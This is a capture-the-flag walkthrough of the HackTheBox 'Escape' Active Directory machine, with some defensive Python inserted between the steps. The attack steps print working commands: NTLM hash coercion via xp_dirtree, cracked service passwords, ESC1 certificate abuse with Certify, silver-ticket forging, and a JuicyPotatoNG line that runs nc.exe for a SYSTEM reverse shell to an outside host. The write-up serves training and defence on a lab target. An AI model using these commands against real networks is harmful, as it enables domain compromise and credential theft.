HackTheBox — Escape

ARZ101
7 min read, Jun 17, 2023


Escape is a medium rated box. It involves enumerating SMB shares as an anonymous user and finding a PDF containing credentials for MSSQL, then coercing NTLM authentication from the sql_svc service account through xp_dirtree, which gives us its NTLMv2 hash. After cracking the hash there are two ways forward: the unintended one is forging a silver ticket, getting a shell as sql_svc and impersonating the administrator through SeImpersonatePrivilege; the intended one is getting a shell through WinRM, finding Ryan.Cooper's password in the SQL Server error log, and abusing an ADCS certificate template to get administrator.

NMAP

Nmap scan report for 10.10.11.202                                                                                                                                                                                       
Host is up (0.26s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 22:30:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T03:01:12
| Not valid after: 2053-02-26T03:01:12
| MD5: 21884a6bf954052953ea17d7d48ef578
|_SHA-1: a5c4b21438d9864636d0923db5bc3785598f6364
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC

Adding the FQDN to the /etc/hosts file.

PORT 139/445 (SMB)

Checking for SMB null authentication, we do see some shares.

In the Public share we see a PDF document.

The first page of the document talks about accessing SQL Server from a non-domain-joined machine; it also reveals three potential usernames: Tom, Brandon and Ryan.

On the next page we'll see the credentials for PublicUser.

Foothold

We can try impacket's mssqlclient to log in to the database with the credentials we found.

mssqlclient.py PublicUser:GuestUserCantWrite1@sequel.htb

Trying to enable xp_cmdshell failed, as the user did not have the required privileges.

With xp_dirtree we can make the account the MSSQL service runs as authenticate to our host and capture its NTLMv2 hash.

xp_dirtree \\10.10.14.70\uwu

With hashcat we can crack the hash; the password is REGGIE1234ronnie.
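From the defender's side, the coercion above leaves a trace: a stored procedure called with a UNC path that points at a host the SQL Server has no business talking to over SMB. The following is an added example, not from the writeup, that flags such calls in captured T-SQL statements; the allowlist, the record format and the sample records are all constructed assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Procedures that take a file-system path and will make the SQL Server service
# account authenticate (NTLM) to whatever host a UNC path names.
UNC_RE = re.compile(
    r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b[^'\"]*['\"]\\\\([^\\'\"]+)", re.IGNORECASE
)

# Constructed allowlist: hosts/networks the SQL service is expected to reach over SMB.
ALLOWED_HOSTS = {"dc.sequel.htb", "fileserver.sequel.htb"}
ALLOWED_NETS = [ip_network("10.10.11.0/24")]

def unc_target(statement):
    """Return (procedure, host) if the statement passes a UNC path to a risky proc."""
    m = UNC_RE.search(statement)
    return (m.group(1).lower(), m.group(2)) if m else None

def is_suspicious(host):
    """True when the UNC host is neither an allowed IP range nor an allowed name."""
    try:
        return not any(ip_address(host) in net for net in ALLOWED_NETS)
    except ValueError:                      # not an IP literal, treat as a hostname
        return host.lower() not in ALLOWED_HOSTS

def flag_coercion(records):
    """Records are dicts with 'login' and 'statement'; returns (login, proc, host) hits."""
    findings = []
    for r in records:
        t = unc_target(r["statement"])
        if t and is_suspicious(t[1]):
            findings.append((r["login"], t[0], t[1]))
    return findings

# Constructed sample records (login + T-SQL text), not real audit output.
SAMPLE = [
    {"login": "PublicUser", "statement": "EXEC master..xp_dirtree '\\\\10.10.14.70\\uwu'"},
    {"login": "backup_svc", "statement": "EXEC xp_dirtree '\\\\fileserver.sequel.htb\\backups', 1, 1"},
    {"login": "PublicUser", "statement": "SELECT name FROM sys.databases"},
]
```

The lasting fix is to run the instance under a virtual account or gMSA rather than a domain user with a crackable password, so a captured NTLMv2 response has nothing worth cracking.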

Trying to log in to MSSQL with this account did not work.

With sql_svc we can enumerate domain users.

However, it still would not log in to MSSQL.

Running BloodHound to enumerate the domain:

python3 /opt/BloodHound.py/bloodhound.py -d 'sequel.htb' -u 'sql_svc' -p 'REGGIE1234ronnie' -c all -ns 10.10.11.202

From BloodHound we can see this user has CanPSRemote on the DC, which means we can log in through the WinRM service using evil-winrm.

evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'

Privilege Escalation (Ryan.Cooper)

Checking C:\SQLServer\Logs\ERRORLOG.BAK, we'll find the password for Ryan.Cooper.
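The reason a password ends up in ERRORLOG is that SQL Server records the login name of every failed logon verbatim, so a password typed into the user-name field is written to disk in clear text. As an added example (not part of the writeup), here is a small audit over such a log that flags failed logons whose "user" is not a known principal; the log lines are constructed and the flagged value is a placeholder, not the box's password.

```python
import re

# Matches SQL Server ERRORLOG failed-login entries (error 18456 style lines).
LOGIN_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Log(?:in|on) failed for user '(?P<login>[^']+)'\. Reason: (?P<reason>[^.\[]+)\."
    r"(?: \[CLIENT: (?P<client>[^\]]+)\])?"
)

def flag_leaked_credentials(lines, known_principals):
    """Return (timestamp, login, client) for failed logins whose 'user' is not a
    known principal: the classic sign of a password typed into the username box."""
    known = {p.lower() for p in known_principals}
    findings = []
    for line in lines:
        m = LOGIN_FAIL_RE.search(line)
        if not m:
            continue
        login = m["login"]
        short = login.split("\\")[-1].lower()    # drop the DOMAIN\ prefix
        if short in known:
            continue                            # real account, ordinary wrong password
        if "could not find a login" in m["reason"].lower():
            findings.append((m["ts"], login, m["client"]))
    return findings

# Constructed ERRORLOG excerpt; the second 'user' is a placeholder, not the box's value.
SAMPLE_ERRORLOG = [
    "2022-11-18 13:43:05.12 Logon       Login failed for user 'sequel.htb\\Ryan.Cooper'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.10.11.202]",
    "2022-11-18 13:43:07.44 Logon       Login failed for user 'NotARealPassword1!'. "
    "Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.202]",
]
KNOWN_PRINCIPALS = {"Ryan.Cooper", "sql_svc", "PublicUser"}

if __name__ == "__main__":
    for ts, login, client in flag_leaked_credentials(SAMPLE_ERRORLOG, KNOWN_PRINCIPALS):
        print(f"{ts}: possible credential in username field ({login!r}) from {client}")
```

Every hit should be treated as a secret exposure: rotate the password and scrub the log and any .BAK copies, which is exactly what was left behind on this box.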

Privilege Escalation (Administrator)

After logging in as Ryan.Cooper, we use Certify to check for vulnerable certificate templates; it can be downloaded from here.

./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

Copy the certificate into a file, cert.pem.

Convert it to cert.pfx

Transfer it back to the Windows machine and use Rubeus to get a TGT for administrator.

Convert the kirbi ticket to ccache with ticketConverter.py.

Having the administrator's ticket, we can run secretsdump.py to dump NTDS.

And now we can simply login with the administrator’s hash to get a shell as administrator on the machine.
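What made the UserAuthentication template abusable is the combination Certify looks for (ESC1): the enrollee may supply the subject/SAN, the certificate is valid for authentication, no approval or extra signature is required, and low-privileged principals can enroll. As an added example (not from the writeup or from Certify), this check evaluates a template's AD attributes and shows the hardened form; the flag constants and EKU OIDs are the real AD values, while the two template records are constructed.

```python
# Template attribute flags and EKU OIDs as stored in AD (real values);
# the two template records below are constructed for illustration.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # in msPKI-Enrollment-Flag: CA manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_issues(t):
    """List the conditions present on template t; ESC1 needs all five at once."""
    name_flag = t["msPKI-Certificate-Name-Flag"] & 0xFFFFFFFF   # LDAP returns it signed
    enroll_flag = t["msPKI-Enrollment-Flag"] & 0xFFFFFFFF
    ekus = set(t["pKIExtendedKeyUsage"])
    issues = []
    if name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        issues.append("enrollee supplies the subject / SAN")
    if not ekus or ekus & AUTH_EKUS:                 # no EKU at all means any purpose
        issues.append("certificate is usable for authentication")
    if not enroll_flag & CT_FLAG_PEND_ALL_REQUESTS:
        issues.append("no manager approval required")
    if t["msPKI-RA-Signature"] == 0:
        issues.append("no authorized signature required")
    if set(t["enroll"]) & LOW_PRIV:
        issues.append("low-privileged principals can enroll")
    return issues

def is_esc1(t):
    return len(esc1_issues(t)) == 5

# Constructed records shaped like the box's UserAuthentication template, before and after fixing.
VULNERABLE = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["Domain Users"],
}
# Fix: build the subject from AD (clear the flag) and require manager approval.
HARDENED = dict(VULNERABLE, **{"msPKI-Certificate-Name-Flag": 0,
                               "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS})
```

Clearing either of the first two conditions is the real fix; restricting enrollment alone only narrows who can request the certificate.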

Un-Intended (Silver Ticket)

As sql_svc was not able to log in to MSSQL, we can try forging a silver ticket to impersonate the administrator on MSSQL. For that we need the NTLM hash of sql_svc and the domain SID.

import hashlib, binascii
# NT hash = MD4 of the UTF-16LE password ('md4' needs OpenSSL's legacy provider on OpenSSL 3 builds)
password = "REGGIE1234ronnie"
nt_hash = hashlib.new('md4', password.encode('utf-16le')).digest()
print(binascii.hexlify(nt_hash).decode())

Through rpcclient we can get the domain SID.

With ticketer.py we can create the silver ticket:

ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -spn MSSQLSvc/dc.sequel.htb -domain sequel.htb -domain-sid S-1-5-21-4078382237-1492182817-2568127209 administrator

Before running mssqlclient, make sure to synchronize the clock with the DC using ntpdate, since Kerberos rejects tickets when the skew is too large (the nmap scan showed the DC about 8 hours off from our time).

sudo ntpdate dc.sequel.htb
mssqlclient.py dc.sequel.htb -k -no-pass

Now we can enable xp_cmdshell to execute commands.

Transferring netcat and getting a reverse shell.

Running whoami /all shows that SeImpersonatePrivilege is enabled, meaning we can abuse it to get a SYSTEM token and eventually a SYSTEM shell.

With JuicyPotato-NG, we can get a reverse shell as SYSTEM:

JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.70 80 -e cmd.exe"
